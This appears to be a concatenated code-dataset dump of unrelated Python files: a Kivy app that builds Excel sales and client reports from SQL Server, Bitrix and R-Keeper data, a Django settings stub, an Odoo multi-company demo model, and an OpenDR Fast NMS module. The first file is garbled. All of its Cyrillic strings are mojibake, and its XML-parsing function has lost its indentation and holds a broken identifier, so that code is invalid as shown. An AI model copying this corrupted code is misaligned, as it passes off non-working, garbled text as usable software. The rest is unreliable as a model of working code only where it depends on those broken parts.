                        outline=Side(border_style='thin',
                                     color='FF000000'),
                        vertical=Side(border_style='thin',
                                      color='FF000000'),
                        horizontal=Side(border_style='thin',
                                        color='FF000000')
                        )
        align_left = Alignment(horizontal='left',
                               vertical='bottom',
                               text_rotation=0,
                               wrap_text=False,
                               shrink_to_fit=False,
                               indent=0)
        number_format = 'General'
        protection = Protection(locked=True,
                                hidden=False)
        # 1-based column-letter lookup: column[1] == 'A'.
        column = ['', 'A', 'B', 'C', 'D', 'E']
        # Current row kept as a string on self so nested helpers can mutate it.
        self.row = '0'

        def next_row():
            # Advance to the next row and return it (as a string for cell addressing).
            self.row = str(int(self.row) + 1)
            return self.row
        # workbook object
        wb = Workbook()
        # active worksheet
        ws = wb.active
        # sheet title
        # ws = wb.create_sheet('ะฟะตัะฒะฐั ัััะฐะฝะธัะฐ', 0)
        ws.title = 'ะะพะปะธัะตััะฒะพ ัะตะปะพะฒะตะบ ะทะฐ ะดะตะฝั'
        # heading font
        ws['A1'].font = h1
        # alignment
        ws['A1'].alignment = align_left
        # column widths (1/7 of a pixel measure)
        ws.column_dimensions['A'].width = 1 / 7 * 124
        ws.column_dimensions['B'].width = 1 / 7 * 21
        ws.column_dimensions['C'].width = 1 / 7 * 95
        ws.column_dimensions['D'].width = 1 / 7 * 24
        ws.column_dimensions['E'].width = 1 / 7 * 80
        # header cells
        # ws['A1'] = "Hello!"
        ws[column[1] + next_row()] = 'ะะพะปะธัะตััะฒะพ ัะตะปะพะฒะตะบ ะทะฐ ะดะตะฝั'
        ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=len(column)-1)
        # heading font
        ws[column[1] + self.row].font = h1
        # alignment
        ws[column[1] + self.row].alignment = align_left
        # title row height
        ws.row_dimensions[1].height = 24
        ws[column[1] + next_row()] = f'{client_count_totals_org[0][0]}'
        ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=len(column) - 1)
        ws[column[1] + self.row].font = font
        ws[column[1] + self.row].alignment = align_top
        # Period line; [-2] is the last dated row (the [-1] row holds totals).
        ws[column[1] + next_row()] = 'ะะฐ ะฟะตัะธะพะด ั:'
        ws[column[1] + self.row].font = font
        ws[column[1] + self.row].alignment = align_top
        ws[column[2] + self.row] = client_count_totals_org[1][0].strftime("%d.%m.%Y")
        ws.merge_cells(start_row=self.row, start_column=2, end_row=self.row, end_column=3)
        ws[column[2] + self.row].font = font_bold
        ws[column[2] + self.row].alignment = align_top
        ws[column[4] + self.row] = 'ะฟะพ'
        ws[column[4] + self.row].font = font
        ws[column[4] + self.row].alignment = align_top
        ws[column[5] + self.row] = (client_count_totals_org[-2][0]).strftime("%d.%m.%Y")
        ws.merge_cells(start_row=self.row, start_column=5, end_row=self.row, end_column=7)
        ws[column[5] + self.row].font = font_bold
        ws[column[5] + self.row].alignment = align_top

        # TABLE -- helpers that merge/style the two logical columns of a row.
        def merge_table():
            # Regular data row.
            ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=2)
            ws.merge_cells(start_row=self.row, start_column=3, end_row=self.row, end_column=5)
            ws[column[1] + self.row].font = font
            ws[column[3] + self.row].font = font
            ws[column[1] + self.row].alignment = align_top
            ws[column[3] + self.row].alignment = align_top
            b = 1
            while b < len(column):
                ws[column[b] + self.row].border = border
                b += 1

        def merge_table_bold():
            # Header / totals row (bold font).
            ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=2)
            ws.merge_cells(start_row=self.row, start_column=3, end_row=self.row, end_column=5)
            ws[column[1] + self.row].font = font_bold
            ws[column[3] + self.row].font = font_bold
            ws[column[1] + self.row].alignment = align_top
            ws[column[3] + self.row].alignment = align_top
            b = 1
            while b < len(column):
                ws[column[b] + self.row].border = border
                b += 1
        # Table header row.
        ws[column[1] + next_row()] = 'ะะฐัะฐ'
        ws[column[3] + self.row] = 'ะะพะปะธัะตััะฒะพ ะบะปะธะตะฝัะพะฒ'
        merge_table_bold()
        # fill background for the header row
        b = 1
        while b < len(column):
            ws[column[b] + self.row].fill = fill
            b += 1
        # One row per dated entry; non-date rows (name/totals) raise
        # AttributeError on strftime and are skipped.
        for line in client_count_totals_org:
            try:
                ws[column[1] + next_row()] = line[0].strftime('%d.%m.%Y')
                ws[column[3] + self.row] = line[1]
                merge_table()
            except AttributeError:
                pass
        # Totals row (last element of the list).
        ws[column[1] + next_row()] = 'ะัะพะณะพ'
        ws[column[3] + self.row] = client_count_totals_org[-1][1]
        merge_table_bold()
        # enlarge all row heights
        max_row = ws.max_row
        i = 2
        while i <= max_row:
            rd = ws.row_dimensions[i]
            rd.height = 18
            i += 1
        # build the target file name from the report period and save
        if client_count_totals_org[0][1]:
            date_ = datetime.strftime(client_count_totals_org[1][0], "%Y-%m")
        else:
            date_ = f'{datetime.strftime(client_count_totals_org[1][0], "%Y-%m-%d")} - ' \
                    f'{datetime.strftime(client_count_totals_org[-2][0], "%Y-%m-%d")}'
        path = self.local_folder + self.path + date_ + f' ะะพะปะธัะตััะฒะพ ะบะปะธะตะฝัะพะฒ ะทะฐ ะดะตะฝั ะฟะพ {client_count_totals_org[0][0]}' + ".xlsx"
        logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพั
ัะฐะฝะตะฝะธะต ะพััะตัะฐ ะฟะพ ะบะพะปะธัะตััะฒั ะบะปะธะตะฝัะพะฒ '
                     f'ะฟะพ {client_count_totals_org[0][0]} ะฒ {path}')
        path = self.create_path(path)
        self.save_file(path, wb)
        return path
def parseXML(self, xmlString):
"""
ะงะขะะะะ XML ะก ะะะะะซะะ
:param xmlString: ัััะพะบะฐ XML ะธะท ะธะฝัะตัะฝะตั-ะผะฐะณะฐะทะธะฝะฐ ะะธััะธะบั
:return: ัะฟะธัะพะบ ัะปะพะฒะฐัะตะน ั ะดะฐะฝะฝัะผะธ
"""
x = re.search(r' encoding="windows-1251"', xmlString)
xml = xmlString[:x.start()] + xmlString[x.end():]
result = []
products_in_bay = -1
last_elem = ''
with open('xml_root.xml', 'w') as f:
f.write(xml)
root = objectify.fromstring(xml)
for doc in root.getchildren():
paydate = ''
pay = False
status = ''
for req in doc.ะะฝะฐัะตะฝะธัะ ะตะบะฒะธะทะธัะพะฒ.getchildren():
if req.ะะฐะธะผะตะฝะพะฒะฐะฝะธะต == 'ะะฐัะฐ ะพะฟะปะฐัั':
paydate = datetime.strftime(datetime.strptime(str(req.ะะฝะฐัะตะฝะธะต), '%d.%m.%Y %H:%M:%S'),
'%Y-%m-%d %H:%M:%S')
if req.ะะฐะธะผะตะฝะพะฒะฐะฝะธะต == 'ะะฐะบะฐะท ะพะฟะปะฐัะตะฝ':
pay = bool(req.ะะฝะฐัะตะฝะธะต)
if req.ะะฐะธะผะตะฝะพะฒะฐะฝะธะต == 'ะกัะฐััั ะทะฐะบะฐะทะฐ':
status = str(req.ะะฝะฐัะตะฝะธะต)
for product in doc.ะขะพะฒะฐัั.getchildren():
count = int(product.ะะพะปะธัะตััะฒะพ)
while count > 0:
count -= 1
result.append(dict())
if last_elem != doc.ะะด:
products_in_bay = -1
last_elem = doc.ะะด
products_in_bay += 1
result[len(result) - 1]['Id_P'] = int(str(doc.ะะด) + str(products_in_bay))
result[len(result) - 1]['OrderNumber'] = int(doc.ะะด)
result[len(result) - 1]['ProductId'] = str(product.ะะด)
result[len(result) - 1]['ProductName'] = str(product.ะะฐะธะผะตะฝะพะฒะฐะฝะธะต)
result[len(result) - 1]['OrderDate'] = datetime.strptime(str(doc.ะะฐัะฐ + ' ' + doc.ะัะตะผั),
'%Y-%m-%d %H:%M:%S').strftime(
'%Y-%m-%d %H:%M:%S')
result[len(result) - 1]['PayDate'] = paydate
result[len(result) - 1]['Sum_P'] = Decimal(float(product.ะฆะตะฝะฐะะฐะะดะธะฝะธัั))
result[len(result) - 1]['Pay_P'] = pay
result[len(result) - 1]['Status_P'] = status
result[len(result) - 1]['Client_P'] = str(doc.ะะพะฝััะฐะณะตะฝัั.ะะพะฝััะฐะณะตะฝั.ะะด)
if result:
logging.info(
f'{datetime.strftime(datetime.now(), "%Y-%m-%d %H:%M:%S"):20}: '
f'ะะพะฒัะน ัะฐะนะป. ะะพะปะธัะตััะฒะพ ัััะพะบ - {len(result)}')
else:
logging.info(f'{datetime.strftime(datetime.now(), "%Y-%m-%d %H:%M:%S"):20}: ะะตั ะฝะพะฒัั
ะฟะพะบัะฟะพะบ.')
return result
def uploadToBase(self,
                 server,
                 database,
                 uid,
                 pwd,
                 Id_P,
                 OrderNumber_P,
                 ProductId_P,
                 ProductName_P,
                 OrderDate_P,
                 PayDate_P,
                 Sum_P,
                 Pay_P,
                 Status_P,
                 Client_P,
                 ):
    """Insert one transaction row into the [Transactions] SQL Server table.

    SECURITY/CORRECTNESS FIX: values are now bound with pyodbc ``?``
    placeholders instead of being f-string-interpolated into the SQL text.
    The old query was open to SQL injection, broke on values containing
    quotes, and rendered the boolean as the Python literal ``True``/``False``
    (invalid T-SQL for a BIT column). The connection is also closed now
    instead of being leaked.

    :return: the status string ``'Upload To SQL-Base: Ready'``
    """
    driver = '{SQL Server}'
    cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={uid};PWD={pwd}')
    try:
        cursor = cnxn.cursor()
        cursor.execute(
            """
            INSERT INTO [Transactions](
                [Id], [OrderNumber], [ProductId], [ProductName], [OrderDate],
                [PayDate], [Sum], [Pay], [Status], [Client]
            )
            VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
            """,
            (Id_P, OrderNumber_P, ProductId_P, ProductName_P, OrderDate_P,
             PayDate_P, Sum_P, Pay_P, Status_P, Client_P),
        )
        cnxn.commit()
    finally:
        cnxn.close()  # release the connection (previously leaked)
    return 'Upload To SQL-Base: Ready'
def if_in_base(self,
               server,
               database,
               uid,
               pwd,
               Id_P,
               ):
    """Return True when NO [Transactions] row with this Id exists yet.

    (The inverted-sounding name is kept for caller compatibility: True means
    "safe to insert".)

    SECURITY FIX: the Id is now bound as a ``?`` parameter instead of being
    f-string-interpolated into the SQL text (injection risk). A single
    ``fetchone`` is enough to decide existence — no need to fetch every
    matching row and count them. The connection is closed on exit.
    """
    driver = '{SQL Server}'
    cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={uid};PWD={pwd}')
    try:
        cursor = cnxn.cursor()
        cursor.execute("SELECT [Id] FROM [Transactions] WHERE [Id] = ?", (Id_P,))
        return cursor.fetchone() is None
    finally:
        cnxn.close()
def load_checkbox(self):
    """Push the option flags loaded from the INI file into the UI checkboxes.

    Each flag attribute on the app has a same-named checkbox id inside the
    report screen, so the mapping is mechanical.
    """
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะฐะณััะทะบะฐ ะฝะฐัััะพะตะบ...')
    report_ids = self.root.ids.report.ids
    for flag in ('split_by_days', 'finreport_xls', 'check_client_count_total_xls',
                 'check_cashreport_xls', 'check_itogreport_xls', 'agentreport_xls',
                 'use_yadisk', 'finreport_google', 'finreport_telegram'):
        getattr(report_ids, flag).active = getattr(self, flag)
def change_checkbox(self, name, checkbox):
    """Persist one boolean option and mirror it onto the app attribute.

    :param name: option/checkbox identifier (attribute name and INI key)
    :param checkbox: new ``active`` state of the checkbox

    Side effect for ``split_by_days``: the Google-report option is only
    meaningful when reports are split by day (or the date switch is on), so
    it is force-disabled/enabled accordingly.
    """
    self.config.set('General', name, str(checkbox))
    setattr(self, name, checkbox)
    self.config.write()
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะฐัะฐะผะตัั {name} ะธะทะผะตะฝะตะฝ ะฝะฐ ะทะฝะฐัะตะฝะธะต {checkbox}')
    if name == 'split_by_days':
        report_ids = self.root.ids.report.ids
        if checkbox:
            report_ids.finreport_google_text.disabled = False
            report_ids.finreport_google.disabled = False
        elif not report_ids.date_switch.active:
            report_ids.finreport_google.active = False
            self.change_checkbox('finreport_google', False)
            report_ids.finreport_google.disabled = True
            report_ids.finreport_google_text.disabled = True
def save_reports(self):
    """Build and export every report enabled by the option flags.

    Relies on ``load_report`` having already populated the ``itog_report_*``,
    ``cashdesk_report_*`` and ``client_count_totals_*`` attributes; produced
    file paths are accumulated in ``self.path_list`` for a later upload.
    """
    self.fin_report()
    self.agent_report()
    if self.finreport_xls:
        self.path_list.append(self.export_fin_report())
    if self.agentreport_xls:
        self.path_list.append(self.export_agent_report(self.agentreport_dict))
    if self.finreport_google:
        # The Google sheet also needs last year's and monthly aggregates.
        self.fin_report_lastyear()
        self.fin_report_beach()
        if self.itog_report_month:
            self.fin_report_month()
            self.agent_report_month()
        if self.export_to_google_sheet():
            self.open_googlesheet()
    if self.finreport_telegram:
        self.sms_report_list.append(self.sms_report())
    if self.check_itogreport_xls:
        # Only save per-organisation totals that actually contain data
        # (index [1] of the grand-total row is the amount).
        if self.itog_report_org1['ะัะพะณะพ ะฟะพ ะพััะตัั'][1]:
            self.path_list.append(self.save_organisation_total(self.itog_report_org1))
        if self.itog_report_org2['ะัะพะณะพ ะฟะพ ะพััะตัั'][1]:
            self.path_list.append(self.save_organisation_total(self.itog_report_org2))
        if self.itog_report_org3['ะัะพะณะพ ะฟะพ ะพััะตัั'][1]:
            self.path_list.append(self.save_organisation_total(self.itog_report_org3))
    if self.check_cashreport_xls:
        if self.cashdesk_report_org1['ะัะพะณะพ'][0][1]:
            self.path_list.append(self.save_cashdesk_report(self.cashdesk_report_org1))
        if self.cashdesk_report_org2['ะัะพะณะพ'][0][1]:
            self.path_list.append(self.save_cashdesk_report(self.cashdesk_report_org2))
    if self.check_client_count_total_xls:
        # Last row of the totals table holds the period grand total.
        if self.client_count_totals_org1[-1][1]:
            self.path_list.append(self.save_client_count_totals(self.client_count_totals_org1))
        if self.client_count_totals_org2[-1][1]:
            self.path_list.append(self.save_client_count_totals(self.client_count_totals_org2))
def load_report(self):
    """Fetch every report for the selected period from the databases.

    Populates the ``itog_report_*``, ``cashdesk_report_*`` and
    ``client_count_totals_*`` attributes for the configured organisations,
    plus Bitrix and R-Keeper data for the current period AND the same period
    one year earlier (for year-over-year comparison in the Google sheet).
    """
    self.itog_report_org1 = None
    self.itog_report_org2 = None
    self.itog_report_org3 = None
    self.report_bitrix = None
    self.click_select_org()
    self.report_bitrix = self.read_bitrix_base(
        server=self.server,
        database=self.database_bitrix,
        user=self.user,
        pwd=self.pwd,
        driver=self.driver,
        date_from=self.date_from,
        date_to=self.date_to,
    )
    self.report_bitrix_lastyear = self.read_bitrix_base(
        server=self.server,
        database=self.database_bitrix,
        user=self.user,
        pwd=self.pwd,
        driver=self.driver,
        date_from=self.date_from - relativedelta(years=1),
        date_to=self.date_to - relativedelta(years=1),
    )
    # cash_id=15033 — R-Keeper cash register id; meaning not derivable from
    # this file, TODO confirm against the R-Keeper configuration.
    self.report_rk = self.rk_report_request(
        server=self.server_rk,
        database=self.database_rk,
        user=self.user_rk,
        pwd=self.pwd_rk,
        driver=self.driver,
        cash_id=15033,
        date_from=self.date_from,
        date_to=self.date_to,
    )
    self.report_rk_lastyear = self.rk_report_request(
        server=self.server_rk,
        database=self.database_rk,
        user=self.user_rk,
        pwd=self.pwd_rk,
        driver=self.driver,
        cash_id=15033,
        date_from=self.date_from - relativedelta(years=1),
        date_to=self.date_to - relativedelta(years=1),
    )
    if self.org1:
        self.itog_report_org1 = self.itog_report(
            server=self.server,
            database=self.database1,
            driver=self.driver,
            user=self.user,
            pwd=self.pwd,
            org=self.org1[0],
            org_name=self.org1[1],
            date_from=self.date_from,
            date_to=self.date_to,
            hide_zeroes='0',
            hide_internal='1',
        )
        self.itog_report_org1_lastyear = self.itog_report(
            server=self.server,
            database=self.database1,
            driver=self.driver,
            user=self.user,
            pwd=self.pwd,
            org=self.org1[0],
            org_name=self.org1[1],
            date_from=self.date_from - relativedelta(years=1),
            date_to=self.date_to - relativedelta(years=1),
            hide_zeroes='0',
            hide_internal='1',
        )
        # NOTE(review): org3 reports are built inside the `if self.org1:`
        # branch and share database1 — looks intentional (org3 lives in the
        # same base), but verify.
        self.itog_report_org3 = self.itog_report(
            server=self.server,
            database=self.database1,
            driver=self.driver,
            user=self.user,
            pwd=self.pwd,
            org=self.org3[0],
            org_name=self.org3[1],
            date_from=self.date_from,
            date_to=self.date_to,
            hide_zeroes='0',
            hide_internal='1',
        )
        self.itog_report_org3_lastyear = self.itog_report(
            server=self.server,
            database=self.database1,
            driver=self.driver,
            user=self.user,
            pwd=self.pwd,
            org=self.org3[0],
            org_name=self.org3[1],
            date_from=self.date_from - relativedelta(years=1),
            date_to=self.date_to - relativedelta(years=1),
            hide_zeroes='0',
            hide_internal='1',
        )
        # When date_to crosses a month boundary, additionally build the
        # whole-previous-month reports.
        if int((self.date_to - timedelta(1)).strftime('%y%m')) < int(self.date_to.strftime('%y%m')):
            self.itog_report_month = self.itog_report(
                server=self.server,
                database=self.database1,
                driver=self.driver,
                user=self.user,
                pwd=self.pwd,
                org=self.org1[0],
                org_name=self.org1[1],
                date_from=datetime.strptime('01' + (self.date_to - timedelta(1)).strftime('%m%y'), '%d%m%y'),
                date_to=self.date_to,
                hide_zeroes='0',
                hide_internal='1',
            )
            self.report_rk_month = self.rk_report_request(
                server=self.server_rk,
                database=self.database_rk,
                user=self.user_rk,
                pwd=self.pwd_rk,
                driver=self.driver,
                cash_id=15033,
                date_from=datetime.strptime('01' + (self.date_to - timedelta(1)).strftime('%m%y'), '%d%m%y'),
                date_to=self.date_to,
            )
        else:
            self.itog_report_month = None
        self.cashdesk_report_org1 = self.cashdesk_report(
            server=self.server,
            database=self.database1,
            driver=self.driver,
            user=self.user,
            pwd=self.pwd,
            date_from=self.date_from,
            date_to=self.date_to,
        )
        self.client_count_totals_org1 = self.client_count_totals_period(
            server=self.server,
            database=self.database1,
            driver=self.driver,
            user=self.user,
            pwd=self.pwd,
            org=self.org1[0],
            org_name=self.org1[1],
            date_from=self.date_from,
            date_to=self.date_to,
        )
    if self.org2:
        self.itog_report_org2 = self.itog_report(
            server=self.server,
            database=self.database2,
            driver=self.driver,
            user=self.user,
            pwd=self.pwd,
            org=self.org2[0],
            org_name=self.org2[1],
            date_from=self.date_from,
            date_to=self.date_to,
            hide_zeroes='0',
            hide_internal='1',
        )
        self.cashdesk_report_org2 = self.cashdesk_report(
            server=self.server,
            database=self.database2,
            driver=self.driver,
            user=self.user,
            pwd=self.pwd,
            date_from=self.date_from,
            date_to=self.date_to,
        )
        self.client_count_totals_org2 = self.client_count_totals_period(
            server=self.server,
            database=self.database2,
            driver=self.driver,
            user=self.user,
            pwd=self.pwd,
            org=self.org2[0],
            org_name=self.org2[1],
            date_from=self.date_from,
            date_to=self.date_to,
        )
    # Read the XML files mapping service groups to services.
    self.orgs_dict = self.read_reportgroup(self.reportXML)
    self.itogreport_group_dict = self.read_reportgroup(self.itogreportXML)
    # Look for services not yet mapped to a report group.
    # FIX: this comment had been split across two source lines by a bad
    # paste, leaving a bare identifier that raised NameError at runtime.
    # NOTE(review): if org1 is falsy, itog_report_org1_lastyear is never set
    # and the next call would raise AttributeError — verify org1 is always
    # configured.
    self.find_new_service(self.itog_report_org1, self.orgs_dict)
    self.find_new_service(self.itog_report_org1_lastyear, self.orgs_dict)
    self.find_new_service(self.itog_report_org3, self.orgs_dict)
    self.find_new_service(self.itog_report_org3_lastyear, self.orgs_dict)
    if self.itog_report_month:
        self.find_new_service(self.itog_report_month, self.orgs_dict)
    self.distibution_service()
def run_report(self):
    """Top-level report driver: load data for the chosen period, then push
    the results to Yandex.Disk / Telegram if those options are enabled.

    When ``split_by_days`` is on (and the single-date switch is off), the
    selected range is walked one day at a time, calling ``load_report`` per
    day.
    """
    self.open_browser = False
    self.path_list = []
    self.sms_report_list = []
    if self.date_switch:
        self.load_report()
    else:
        if self.split_by_days:
            # Expand [date_from, date_to) into a list of single days.
            period = []
            while True:
                period.append(self.date_from)
                if self.date_from + timedelta(1) == self.date_to:
                    break
                else:
                    self.date_from = self.date_from + timedelta(1)
            for date in period:
                self.date_from = date
                self.date_to = date + timedelta(1)
                self.load_report()
            # Restore date_from from the UI field after mutating it above.
            self.date_from = datetime.strptime(self.root.ids.report.ids.date_from.text, "%Y-%m-%d")
        else:
            self.load_report()
    # Upload generated files to Yandex.Disk.
    if self.use_yadisk:
        self.path_list = filter(lambda x: x is not None, self.path_list)
        self.sync_to_yadisk(self.path_list, self.yadisk_token)
        self.path_list = []
    # Send the summary to Telegram.
    if self.finreport_telegram:
        self.send_message_to_telegram()
        self.sms_report_list = []
# The module is driven from elsewhere (the kivy app); nothing runs standalone.
if __name__ == '__main__':
    pass
| 50.719224 | 178 | 0.475653 |
ace8b2ffd3d6460d46122eebc7e89492370c0484 | 315 | py | Python | src/settings/components/frontend.py | pradipta/back-end | 05895b051afc4c8e0cb17db708063d80102e9de5 | [
"MIT"
] | 17 | 2019-05-11T22:15:34.000Z | 2022-03-26T22:45:33.000Z | src/settings/components/frontend.py | pradipta/back-end | 05895b051afc4c8e0cb17db708063d80102e9de5 | [
"MIT"
] | 390 | 2019-05-23T10:48:57.000Z | 2021-12-17T21:01:43.000Z | src/settings/components/frontend.py | pradipta/back-end | 05895b051afc4c8e0cb17db708063d80102e9de5 | [
"MIT"
] | 40 | 2019-05-21T14:41:57.000Z | 2021-01-30T13:39:38.000Z | """
Configs for the temporary frontend app
"""
from settings.components import config
# reCAPTCHA site/secret key pair; empty defaults leave the values unset
# outside of configured environments.
RECAPTCHA_PUBLIC_KEY = config("RECAPTCHA_PUBLIC_KEY", default="")
RECAPTCHA_PRIVATE_KEY = config("RECAPTCHA_PRIVATE_KEY", default="")
# GitHub integration settings — presumably a token for API calls and the
# target repository slug; confirm against the code that consumes them.
GITHUB_JWT = config("GITHUB_JWT", default="")
GITHUB_REPO = config("GITHUB_REPO", default="")
| 31.5 | 67 | 0.771429 |
ace8b3640510abd33ada2d269cb829870c4f8d83 | 991 | py | Python | demo_multi_company/models/model.py | digitalsatori/odoo-demo-addons-tutorial | 8eb56156ac55f317f90bca089886c392556759c2 | [
"MIT"
] | 57 | 2020-06-22T05:28:11.000Z | 2022-03-25T08:15:08.000Z | demo_multi_company/models/model.py | digitalsatori/odoo-demo-addons-tutorial | 8eb56156ac55f317f90bca089886c392556759c2 | [
"MIT"
] | 2 | 2020-11-20T07:11:27.000Z | 2022-03-30T00:20:29.000Z | demo_multi_company/models/model.py | digitalsatori/odoo-demo-addons-tutorial | 8eb56156ac55f317f90bca089886c392556759c2 | [
"MIT"
] | 29 | 2020-07-04T15:24:01.000Z | 2022-03-28T01:29:03.000Z | from odoo import models, fields
import logging
_logger = logging.getLogger(__name__)
class DemoCompany(models.Model):
    """Demo model illustrating a company-dependent (multi-company) property
    field and how its per-company default is read back from ``ir.property``.
    """
    _name = 'demo.company'
    _description = 'Demo Company'

    name = fields.Char('Description', required=True)
    # company_dependent=True stores the value per company via ir.property
    # rather than in a plain table column.
    property_account_receivable_id = fields.Many2one('account.account',
        company_dependent=True,
        string="Account Receivable",
        domain="[('internal_type', '=', 'receivable'), ('deprecated', '=', False)]",
        required=True)
    company_id = fields.Many2one('res.company', string='Company', required=True, readonly=True, default=lambda self: self.env.user.company_id)

    def action_get_default_account(self):
        # Read the company-specific default straight from ir.property,
        # forcing this record's company, and log both it and the field value
        # for comparison (demo/debug output only).
        default_account = self.env['ir.property'].with_context(force_company=self.company_id.id).get('property_account_receivable_id', 'demo.company')
        _logger.warning(default_account)
        _logger.warning(self.property_account_receivable_id)
        _logger.warning('============= HELLO ==================')
| 39.64 | 150 | 0.69223 |
ace8b37089649fd3f70e4d47c94442bf6bf7d72d | 5,320 | py | Python | src/opendr/perception/object_detection_2d/nms/fast_nms/fast_nms.py | daoran/opendr | bca25f6a43244fe9c219a24576181f94a0726923 | [
"Apache-2.0"
] | null | null | null | src/opendr/perception/object_detection_2d/nms/fast_nms/fast_nms.py | daoran/opendr | bca25f6a43244fe9c219a24576181f94a0726923 | [
"Apache-2.0"
] | null | null | null | src/opendr/perception/object_detection_2d/nms/fast_nms/fast_nms.py | daoran/opendr | bca25f6a43244fe9c219a24576181f94a0726923 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020-2022 OpenDR European Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file contains code from the CIoU distribution (https://github.com/Zzh-tju/CIoU).
# Copyright (c) 2020 Zheng, Zhaohui.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from opendr.perception.object_detection_2d.nms.utils import NMSCustom
from opendr.perception.object_detection_2d.nms.utils.nms_utils import jaccard
from opendr.engine.target import BoundingBox, BoundingBoxList
import torch
import numpy as np
class FastNMS(NMSCustom):
    """Fast NMS (per-class or class-agnostic) as an OpenDR NMSCustom backend."""

    def __init__(self, cross_class=False, device='cuda', iou_thres=0.45, top_k=400, post_k=100):
        self.device = device
        self.iou_thres = iou_thres
        self.top_k = top_k
        self.post_k = post_k
        self.cross_class = cross_class

    def set_iou_thres(self, iou_thres=0.45):
        self.iou_thres = iou_thres

    # BUG FIX: these setters were previously named `top_k` / `post_k`, which
    # made them uncallable — __init__ stores integer attributes under the
    # same names, shadowing the methods on every instance
    # (`inst.top_k(400)` raised "'int' object is not callable"). Renamed to
    # match the `set_iou_thres` / `set_cross_class` convention.
    def set_top_k(self, top_k=400):
        self.top_k = top_k

    def set_post_k(self, post_k=100):
        self.post_k = post_k

    def set_cross_class(self, cross_class=False):
        self.cross_class = cross_class

    def _to_device(self, data):
        """Coerce numpy arrays to tensors and move tensors to the configured
        device; anything else is returned unchanged (mirrors old behavior)."""
        if isinstance(data, np.ndarray):
            return torch.tensor(data, device=self.device)
        if torch.is_tensor(data):
            if self.device == 'cpu':
                return data.cpu()
            if self.device == 'cuda':
                return data.cuda()
        return data

    def run_nms(self, boxes=None, scores=None, threshold=0.2, img=None):
        """Run (cross-class or per-class) Fast NMS and wrap the survivors.

        :param boxes: (N, 4) boxes, numpy array or tensor
        :param scores: (N, num_classes) scores, numpy array or tensor
        :param threshold: final score cut applied after NMS
        :param img: unused, kept for interface compatibility
        :return: (BoundingBoxList, [boxes, classes, scores]) as numpy arrays
        """
        boxes = self._to_device(boxes)
        scores = self._to_device(scores)
        # NMS helpers expect scores as (num_classes, N).
        scores = torch.transpose(scores, dim0=1, dim1=0)
        nms_fn = cc_fast_nms if self.cross_class else fast_nms
        boxes, classes, scores = nms_fn(boxes=boxes, scores=scores, iou_thres=self.iou_thres,
                                        top_k=self.top_k, post_k=self.post_k)
        keep_ids = torch.where(scores > threshold)
        scores = scores[keep_ids].cpu().numpy()
        classes = classes[keep_ids].cpu().numpy()
        boxes = boxes[keep_ids].cpu().numpy()
        bounding_boxes = BoundingBoxList([])
        for idx, box in enumerate(boxes):
            bbox = BoundingBox(left=box[0], top=box[1],
                               width=box[2] - box[0],
                               height=box[3] - box[1],
                               name=classes[idx],
                               score=scores[idx])
            bounding_boxes.data.append(bbox)
        return bounding_boxes, [boxes, classes, scores]
def fast_nms(boxes=None, scores=None, iou_thres=0.45, top_k=400, post_k=200):
    """Per-class Fast NMS: a box is suppressed when any higher-scored box of
    the same class overlaps it by more than ``iou_thres``.

    :param boxes: (N, 4) box tensor
    :param scores: (num_classes, N) score tensor
    :return: (boxes, classes, scores) for at most ``post_k`` detections,
        globally sorted by score
    """
    # Rank detections within each class and keep the best top_k candidates.
    scores, order = scores.sort(1, descending=True)
    candidates = boxes[order, :][:, :top_k]
    scores = scores[:, :top_k]
    num_classes, num_dets = scores.shape
    candidates = candidates.view(num_classes, num_dets, 4)
    # Upper-triangular IoU: each box is compared only against higher-ranked
    # boxes of the same class.
    overlap = jaccard(candidates, candidates).triu_(diagonal=1)
    worst_overlap, _ = overlap.max(dim=1)
    keep = (worst_overlap <= iou_thres) & (scores > 0.01)
    class_ids = torch.arange(num_classes, device=candidates.device)[:, None].expand_as(keep)
    class_ids = class_ids[keep]
    candidates = candidates[keep]
    scores = scores[keep]
    # Re-rank the survivors globally across classes and truncate to post_k.
    scores, order = scores.sort(0, descending=True)
    order = order[:post_k]
    scores = scores[:post_k]
    return candidates[order], class_ids[order], scores
def cc_fast_nms(boxes=None, scores=None, iou_thres=0.45, top_k=400, post_k=200):
    """Cross-class (class-agnostic) Fast NMS.

    Each detection keeps its best-scoring class label, then suppression runs
    over all boxes together, ignoring class membership.

    :param boxes: (N, 4) box tensor
    :param scores: (num_classes, N) score tensor
    :return: (boxes, classes, scores) for at most ``post_k`` detections
    """
    scores, class_ids = scores.max(dim=0)
    _, order = scores.sort(0, descending=True)
    order = order[:top_k]
    boxes = boxes[order]
    scores = scores[order]
    class_ids = class_ids[order]
    # Upper-triangular IoU against higher-scored boxes only.
    overlap = jaccard(boxes, boxes).triu_(diagonal=1)
    column_max, _ = torch.max(overlap, dim=0)
    # Zero the score of every box dominated by a higher-scored overlap.
    scores[torch.where(column_max > iou_thres)] = 0
    scores, order = scores.sort(0, descending=True)
    order = order[:post_k]
    scores = scores[:post_k]
    return boxes[order], class_ids[order], scores
| 35.945946 | 104 | 0.640977 |
